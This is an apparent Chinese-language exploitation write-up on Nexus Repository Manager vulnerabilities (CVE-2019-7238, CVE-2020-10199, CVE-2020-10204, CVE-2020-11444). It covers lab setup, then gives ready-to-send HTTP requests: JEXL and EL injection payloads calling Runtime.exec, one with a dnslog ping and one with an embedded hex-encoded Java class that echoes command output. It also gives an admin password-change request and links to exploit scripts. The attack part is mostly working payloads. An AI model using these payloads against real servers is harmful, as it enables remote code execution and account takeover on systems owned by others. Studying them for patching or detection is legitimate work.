Nexus Repository Manager漏洞利用总结-小白-漏洞文库小世界-安全文库-NGC660 安全实验室

Nexus Repository Manager漏洞利用总结-小白

一、简介

Nexus是一套“开箱即用”的系统不需要数据库,它使用文件系统加Lucene来组织数据。
Nexus使用ExtJS来开发界面,利用Restlet来提供完整的REST APIs,通过m2eclipse与Eclipse集成使用。
Nexus支持WebDAV与LDAP安全身份认证。
Nexus还提供了强大的仓库管理功能,构件搜索功能,它基于REST,友好的UI是一个extjs的REST客户端,它占用较少的内存,基于简单文件系统而非数据库。

二、影响版本

CVE-2019-7238  Nexus Repository Manager OSS/Pro 3.6.2至3.14.0

CVE-2020-10199 Nexus Repository before 3.21.2

CVE-2020-10204 Nexus Repository before 3.21.2

三、环境搭建

CVE-2019-7238

下载安装包
https://help.sonatype.com/repomanager3/download/download-archives—repository-manager-3

这里面包含得现有的所有版本,自己找到对应漏洞范围内的版本即可。

下载好之后解压压缩包

tar -zxvf nexus-3.13.0-01-unix.tar.gz

进入 nexus-3.13.0-01-unix/nexus-3.13.0-01/bin 启动环境

./nexus start

访问环境

1596121488761-01a3aa85-771b-4b83-bc10-4188b668d01a

CVE-2020-10199/10204/11444

还是上面的连接,直接找对应漏洞版本下载。

tar -zxvf nexus-3.13.0-01-unix.tar.gz
./nexus start

访问环境

1596121506200-9f90e3d0-eb8f-4405-af3c-17a5bdb0932c

1596121546275-3dfb5213-8f1c-4e0f-8ede-c6305c82a52f

四、漏洞复现

CVE-2019-7238

登陆默认管理员账号 admin/admin123(默认的)

漏洞触发的条件需要maven仓库内必须要至少一个包,如果没有需要登陆后自行上传一个任意包

1596121563595-a29f9f00-fc2c-4016-a5fa-ab9a6a5c81bc

利用方式:

这里直接给出POC:

①、无回显:

通过请求包的方式,该方式无文件落地,可借助dnslog作为poc检测使用:

POST /service/extdirect HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 426
Connection: close

{"type": "rpc", "method": "previewAssets", "tid": 18, "data": [{"limit": 50, "sort": [{"property": "name", "direction": "ASC"}], "page": 1, "filter": [{"value": "*", "property": "repositoryName"}, {"value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec(\"ping -c 1 test.xxx.dnslog.cn\")", "property": "expression"}, {"value": "jexl", "property": "type"}], "start": 0}], "action": "coreui_Component"}

②、有回显:

通过请求包的方式,这边直接给出POC:

POST /service/extdirect HTTP/1.1
Host: 127.0.0.1:8081
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 7247
Connection: close

{"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": [{"direction": "ASC", "property": "name"}], "start": 0, "filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "function(x, y, z, c, integer, defineClass){   c=1.class.forName('java.lang.Character');   integer=1.class;   x='CAFEBABE0000003100AE0A001F00560A005700580A005700590A005A005B0A005A005C0A005D005E0A005D005F0700600A000800610A006200630700640800650A001D00660800410A001D00670A006800690A0068006A08006B08004508006C08006D0A006E006F0A006E00700A001F00710A001D00720800730A000800740800750700760A001D00770700780A0079007A08007B08007C07007D0A0023007E0A0023007F0700800100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C65010004746869730100114C4578706C6F69742F546573743233343B01000474657374010015284C6A6176612F6C616E672F537472696E673B29560100036F626A0100124C6A6176612F6C616E672F4F626A6563743B0100016901000149010003636D640100124C6A6176612F6C616E672F537472696E673B01000770726F636573730100134C6A6176612F6C616E672F50726F636573733B01000269730100154C6A6176612F696F2F496E70757453747265616D3B010006726573756C740100025B42010009726573756C745374720100067468726561640100124C6A6176612F6C616E672F5468726561643B0100056669656C640100194C6A6176612F6C616E672F7265666C6563742F4669656C643B01000C7468726561644C6F63616C7301000E7468726561644C6F63616C4D61700100114C6A6176612F6C616E672F436C6173733B01000A7461626C654669656C640100057461626C65010005656E74727901000A76616C75654669656C6401000E68747470436F6E6E656374696F6E01000E48747470436F6E6E656374696F6E0100076368616E6E656C01000B487474704368616E6E656C010008726573706F6E7365010008526573706F6E73650100067772697465720100154C6A6176612F696F2F5072696E745772697465723B0100164C6F63616C5661726961626C65547970655461626C650100144C6A6176612F6C616E672F436C6173733C2A3E3B01000A457863657074696F6E7307008101000A536F7572636546696C6501000C546573743233342E6A6176610C002700280700820C008300840C008500860700870C008800890C008A008B07008C0C008D00890C008E008F0100106A6176612F6C616E672F537472696E670C002700900700910C009200930100116A6176612F6C616E672F496E74656765720100106A6176612E6C616E672E5468726561640C009400950C009600970700980C0099009A0C009B009C0100246A6176612E6C616E672E5468726561644C6F63616C245468726561644C6F63616C4D617001002A6A6176612E6C616E672E5468726561644C6F63616C245468726561644C6F63616C4D617024456E74727901000576616C756507009D0C009E009F0C009B00A00C00A100A20C00A300A40100276F72672E65636C697073652E6A657474792E7365727665722E48747470436F6E6E656374696F6E0C00A500A601000E676574487474704368616E6E656C01000F6A6176612F6C616E672F436C6173730C00A700A80100106A6176612F6C616E672F4F626A6563740700A90C00AA00AB01000B676574526573706F6E73650100096765745772697465720100136A6176612F696F2F5072696E745772697465720C00AC002F0C00AD002801000F4578706C6F69742F546573743233340100136A6176612F6C616E672F457863657074696F6E0100116A6176612F6C616E672F52756E74696D6501000A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B01000465786563010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0100116A6176612F6C616E672F50726F6365737301000777616974466F7201000328294901000E676574496E70757453747265616D01001728294C6A6176612F696F2F496E70757453747265616D3B0100136A6176612F696F2F496E70757453747265616D010009617661696C61626C6501000472656164010007285B4249492949010005285B4229560100106A6176612F6C616E672F54687265616401000D63757272656E7454687265616401001428294C6A6176612F6C616E672F5468726561643B010007666F724E616D65010025284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F436C6173733B0100106765744465636C617265644669656C6401002D284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F7265666C6563742F4669656C643B0100176A6176612F6C616E672F7265666C6563742F4669656C6401000D73657441636365737369626C65010004285A2956010003676574010026284C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0100176A6176612F6C616E672F7265666C6563742F41727261790100096765744C656E677468010015284C6A6176612F6C616E672F4F626A6563743B2949010027284C6A6176612F6C616E672F4F626A6563743B49294C6A6176612F6C616E672F4F626A6563743B010008676574436C61737301001328294C6A6176612F6C616E672F436C6173733B0100076765744E616D6501001428294C6A6176612F6C616E672F537472696E673B010006657175616C73010015284C6A6176612F6C616E672F4F626A6563743B295A0100096765744D6574686F64010040284C6A6176612F6C616E672F537472696E673B5B4C6A6176612F6C616E672F436C6173733B294C6A6176612F6C616E672F7265666C6563742F4D6574686F643B0100186A6176612F6C616E672F7265666C6563742F4D6574686F64010006696E766F6B65010039284C6A6176612F6C616E672F4F626A6563743B5B4C6A6176612F6C616E672F4F626A6563743B294C6A6176612F6C616E672F4F626A6563743B0100057772697465010005636C6F736500210026001F000000000002000100270028000100290000002F00010001000000052AB70001B100000002002A00000006000100000009002B0000000C000100000005002C002D00000009002E002F0002002900000304000400140000013EB800022AB600034C2BB60004572BB600054D2CB60006BC084E2C2D032CB60006B6000757BB0008592DB700093A04B8000A3A05120B57120CB8000D120EB6000F3A06190604B6001019061905B600113A07120B571212B8000D3A0819081213B6000F3A09190904B6001019091907B600113A0A120B571214B8000D3A0B190B1215B6000F3A0C190C04B60010013A0D03360E150E190AB80016A2003E190A150EB800173A0F190FC70006A70027190C190FB600113A0D190DC70006A70016190DB60018B60019121AB6001B990006A70009840E01A7FFBE190DB600183A0E190E121C03BD001DB6001E190D03BD001FB600203A0F190FB600183A101910122103BD001DB6001E190F03BD001FB600203A111911B600183A121912122203BD001DB6001E191103BD001FB60020C000233A1319131904B600241913B60025B100000003002A0000009600250000001600080017000D0018001200190019001A0024001B002E001D0033001F004200200048002100510023005B002500640026006A002700730029007D002A0086002B008C002D008F002F009C003100A5003200AA003300AD003500B6003600BB003700BE003900CE003A00D1002F00D7003D00DE003E00F4003F00FB004001110041011800420131004401380045013D0049002B000000DE001600A5002C00300031000F0092004500320033000E0000013E003400350000000801360036003700010012012C00380039000200190125003A003B0003002E0110003C003500040033010B003D003E0005004200FC003F00400006005100ED004100310007005B00E3004200430008006400DA004400400009007300CB00450031000A007D00C100460043000B008600B800470040000C008F00AF00480031000D00DE006000490043000E00F4004A004A0031000F00FB0043004B004300100111002D004C0031001101180026004D004300120131000D004E004F00130050000000340005005B00E3004200510008007D00C100460051000B00DE006000490051000E00FB0043004B0051001001180026004D005100120052000000040001005300010054000000020055';   y=0;   z='';   while (y lt x.length()){       z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0];       y += 2;   };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \ndefineClass.setAccessible(true);\nx=defineClass.invoke(\n    y,\n   'Exploit.Test234',\n    z.getBytes('latin1'),    0,\n    3054\n);x.getMethod('test', ''.class).invoke(null, 'whoami');'done!'}\n"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1}], "method": "previewAssets"}

这里直接贴出两位大佬的脚本:

https://github.com/jas502n/CVE-2019-7238

1596121592171-1c6c639c-d6e2-4b4b-a654-92cfa06b0dda

https://github.com/magicming200/CVE-2019-7238_Nexus_RCE_Tool

1596121602531-900ea60d-2925-4e93-8657-15e1a60a5b52

CVE-2020-10199

环境搭建好之后,利用方式很简单。。。

这里直接给出脚本地址:

https://github.com/zhzyker/exphub/blob/master/nexus/cve-2020-10199_cmd.py

1596121617813-2dcda47b-be4a-4b4a-a6cc-c7269f948eba

需要注意的是,CVE-2020-10199的利用方式需要权限,也就是需要一个可登录的账号密码才能利用。

POC:

普通用户权限:

POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: 127.0.0.1:8081
Content-Length: 195
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.7886248393834028
Content-Type: application/json
Accept: */*
Origin: http://127.0.0.1:8081
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://127.0.0.1:8081/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520; NX-ANTI-CSRF-TOKEN=0.7886248393834028; NXSESSIONID=396e7352-f76c-4bdd-9833-98d7990dca3b
Connection: close

{
  "name": "internal",
  "online": true,
  "storage": {
    "blobStoreName": "default",
    "strictContentTypeValidation": true
  },
  "group": {
    "memberNames": ["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/cve-2020-10199')}"]
  }
}

CVE-2020-10204

先给出脚本链接:

https://github.com/zhzyker/exphub/blob/master/nexus/cve-2020-10204_cmd.py

利用都需要一个用户登陆,这里给出两个POC

利用更新用户接口

POST /service/extdirect HTTP/1.1
Host: 127.0.0.1:8081
Content-Length: 301
accept: application/json
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.16936373694860252
Content-Type: application/json
Origin: http://127.0.0.1:8081
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://127.0.0.1:8081/swagger-ui/?_v=3.21.1-01&_e=OSS
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520; NX-ANTI-CSRF-TOKEN=0.16936373694860252; NXSESSIONID=4e5437b3-7755-4784-bda6-d004e8f589fb
Connection: close

{"action":"coreui_User","method":"update","data":[{"userId":"www","version":"2","firstName":"www","lastName":"www","email":"www@qq.com","status":"active","roles":["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/cve-2020-10204')}"]}],"type":"rpc","tid":9}

利用创建角色接口:

POST /service/extdirect HTTP/1.1
Host: 127.0.0.1:8081
Content-Length: 294
accept: application/json
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.856555763510765
Content-Type: application/json
Origin: http://127.0.0.1:8081
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://127.0.0.1:8081/swagger-ui/?_v=3.21.1-01&_e=OSS
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: jenkins-timestamper-offset=-28800000; Hm_lvt_8346bb07e7843cd10a2ee33017b3d627=1583249520; NX-ANTI-CSRF-TOKEN=0.856555763510765; NXSESSIONID=da418706-f4e4-468e-93ac-de9c46802f11
Connection: close

{"action":"coreui_Role","method":"create","data":[{"version":"","source":"default","id":"1111","name":"2222","description":"3333","privileges":["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/cve-2020-10204')}"],"roles":[]}],"type":"rpc","tid":89}

CVE-2020-11444

利用脚本:

https://github.com/zhzyker/exphub/blob/master/nexus/cve-2020-11444_exp.py

1596121639691-c4d21e04-3c01-4082-b937-a12e70e63efe

需要登陆后获取session

或者登陆后直接调用接口

POC:

PUT /service/rest/beta/security/users/admin/change-password HTTP/1.1
Host: 127.0.0.1:8081
Content-Length: 6
accept: application/json
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.6080434247960143
Content-Type: text/plain
Origin: http://127.0.0.1:8081
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://127.0.0.1:8081/swagger-ui/?_v=3.21.1-01&_e=OSS
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.6080434247960143; NXSESSIONID=af3706e2-dc9e-47fa-9739-edb6b3d512fe
Connection: close

123456
请登录后发表评论

    请登录后查看回复内容